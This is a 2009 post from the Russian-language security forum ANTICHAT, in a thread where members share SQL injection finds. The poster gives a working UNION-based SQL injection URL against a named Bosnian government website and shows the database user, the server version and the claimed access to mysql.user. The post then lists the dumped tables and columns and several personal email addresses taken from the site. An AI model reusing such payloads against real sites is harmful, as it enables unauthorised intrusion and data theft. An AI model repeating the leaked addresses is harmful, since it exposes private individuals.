SQL Инъекции — ANTICHAT Forum

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

30.06.2009, 19:28

Fata1ex

Постоянный

Регистрация: 12.12.2006

Сообщений: 906

Провел на форуме:
4205500

Репутация: 930

Как мило. Я почему-то решил, что уж подобрать столбцы и вывести сможет любой ) Поэтому и нераскрученные... тем более недокрученных было всего 4 из 9 = ) Ну ладно

www.iddeea.gov.ba

Код:

http://www.iddeea.gov.ba/hr_vijesti.php?id=-191+union+select+1,concat(user(),0x3a,version()),3,4/*

root@80.65.66.99:5.0.45

Вывод из mysql.user есть ;)

[TABLES]
user
user_info
users
db

user:
User
Password

user_info:
Full_name
Email

users:
email

db:
db
user


Users.Email:
zagorkresevo@hotmail.com
strateski.razvoj@etikete-agens
nevzad_r@hotmail.com
...

Ctacok, жжошь

Сам бы ни за что не догадался (: